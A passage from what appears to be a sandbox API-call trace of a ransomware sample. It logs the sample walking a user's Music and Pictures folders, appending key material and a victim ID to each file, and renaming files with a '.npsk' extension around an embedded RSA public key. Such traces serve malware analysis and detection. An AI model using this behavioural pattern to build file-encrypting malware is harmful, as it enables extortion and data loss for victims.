KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.694] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.695] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2018) returned 1 [0215.696] CryptCreateHash (in: hProv=0x7b2018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.696] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.696] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.696] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.696] GetLastError () returned 0x0 [0215.696] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.696] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0215.696] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.696] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.696] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.696] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.697] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xb1bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.697] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.697] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.697] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.697] CloseHandle (hObject=0x61c) returned 1 [0215.700] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zlzVO4InXVjGcjVW.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zlzvo4inxvjgcjvw.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zlzVO4InXVjGcjVW.m4a.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zlzvo4inxvjgcjvw.m4a.npsk")) returned 1 [0215.702] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef93c130, ftCreationTime.dwHighDateTime=0x1d5e1d1, ftLastAccessTime.dwLowDateTime=0xd5f0ea80, ftLastAccessTime.dwHighDateTime=0x1d5e1ba, ftLastWriteTime.dwLowDateTime=0xd5f0ea80, ftLastWriteTime.dwHighDateTime=0x1d5e1ba, nFileSizeHigh=0x0, nFileSizeLow=0xa3bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZvUOWEfZtl8FASO.wav", cAlternateFileName="ZVUOWE~1.WAV")) returned 1 [0215.702] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZvUOWEfZtl8FASO.wav") returned=".wav" [0215.702] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZvUOWEfZtl8FASO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zvuowefztl8faso.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.702] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=41916) returned 1 [0215.703] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.705] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xa396, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.705] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.706] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xa3bc, lpOverlapped=0x0) returned 1 [0215.707] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.707] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.707] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.708] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0215.709] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.709] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.709] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.709] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.709] GetLastError () returned 0x0 [0215.709] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.709] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0215.709] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.709] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.709] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.709] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.710] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xa3bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.710] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.710] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.710] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.710] CloseHandle (hObject=0x61c) returned 1 [0215.716] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZvUOWEfZtl8FASO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zvuowefztl8faso.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZvUOWEfZtl8FASO.wav.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zvuowefztl8faso.wav.npsk")) returned 1 [0215.717] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef93c130, ftCreationTime.dwHighDateTime=0x1d5e1d1, ftLastAccessTime.dwLowDateTime=0xd5f0ea80, ftLastAccessTime.dwHighDateTime=0x1d5e1ba, ftLastWriteTime.dwLowDateTime=0xd5f0ea80, ftLastWriteTime.dwHighDateTime=0x1d5e1ba, nFileSizeHigh=0x0, nFileSizeLow=0xa3bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZvUOWEfZtl8FASO.wav", cAlternateFileName="ZVUOWE~1.WAV")) returned 0 [0215.717] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0215.718] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.718] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.718] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0215.718] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.718] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.718] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.718] PathFindFileNameW (pszPath="") returned="" [0215.718] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef93c130, ftCreationTime.dwHighDateTime=0x1d5e1d1, ftLastAccessTime.dwLowDateTime=0xd5f0ea80, ftLastAccessTime.dwHighDateTime=0x1d5e1ba, ftLastWriteTime.dwLowDateTime=0xd5f0ea80, ftLastWriteTime.dwHighDateTime=0x1d5e1ba, nFileSizeHigh=0x0, nFileSizeLow=0xa3bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZvUOWEfZtl8FASO.wav", cAlternateFileName="ZVUOWE~1.WAV")) returned 0xffffffff [0215.718] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.718] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.718] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0215.718] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.719] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.719] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.719] PathFindFileNameW (pszPath="") returned="" [0215.719] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef93c130, ftCreationTime.dwHighDateTime=0x1d5e1d1, ftLastAccessTime.dwLowDateTime=0xd5f0ea80, ftLastAccessTime.dwHighDateTime=0x1d5e1ba, ftLastWriteTime.dwLowDateTime=0xd5f0ea80, ftLastWriteTime.dwHighDateTime=0x1d5e1ba, nFileSizeHigh=0x0, nFileSizeLow=0xa3bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZvUOWEfZtl8FASO.wav", cAlternateFileName="ZVUOWE~1.WAV")) returned 0xffffffff [0215.719] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.719] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.719] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0215.719] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.719] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.719] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.719] PathFindFileNameW (pszPath="") returned="" [0215.719] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9c67c80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9c67c80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0215.719] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9c67c80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9c67c80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0215.720] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b04f3d0, ftCreationTime.dwHighDateTime=0x1d5e735, ftLastAccessTime.dwLowDateTime=0x6b4a1590, ftLastAccessTime.dwHighDateTime=0x1d5e4f7, ftLastWriteTime.dwLowDateTime=0x6b4a1590, ftLastWriteTime.dwHighDateTime=0x1d5e4f7, nFileSizeHigh=0x0, nFileSizeLow=0xf00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5r-EikMshU.gif", cAlternateFileName="5R-EIK~1.GIF")) returned 1 [0215.720] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5r-EikMshU.gif") returned=".gif" [0215.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5r-EikMshU.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5r-eikmshu.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.721] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=3840) returned 1 [0215.721] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.723] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xeda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.723] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.725] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xf00, lpOverlapped=0x0) returned 1 [0215.725] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.725] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.725] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.725] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0215.726] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.726] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.726] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.726] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.726] GetLastError () returned 0x0 [0215.726] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.726] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0215.726] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.726] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.726] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.726] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.727] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xf00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.727] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.727] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.727] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.727] CloseHandle (hObject=0x61c) returned 1 [0215.731] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5r-EikMshU.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5r-eikmshu.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5r-EikMshU.gif.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5r-eikmshu.gif.npsk")) returned 1 [0215.733] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0215.733] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned=".ini" [0215.733] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1404ccf0, ftCreationTime.dwHighDateTime=0x1d5ddac, ftLastAccessTime.dwLowDateTime=0x422db3c0, ftLastAccessTime.dwHighDateTime=0x1d5e447, ftLastWriteTime.dwLowDateTime=0x422db3c0, ftLastWriteTime.dwHighDateTime=0x1d5e447, nFileSizeHigh=0x0, nFileSizeLow=0xe0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="l3X0rIq0ylmfa7Fmqc.gif", cAlternateFileName="L3X0RI~1.GIF")) returned 1 [0215.733] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l3X0rIq0ylmfa7Fmqc.gif") returned=".gif" [0215.733] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l3X0rIq0ylmfa7Fmqc.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l3x0riq0ylmfa7fmqc.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.734] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=3598) returned 1 [0215.734] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, 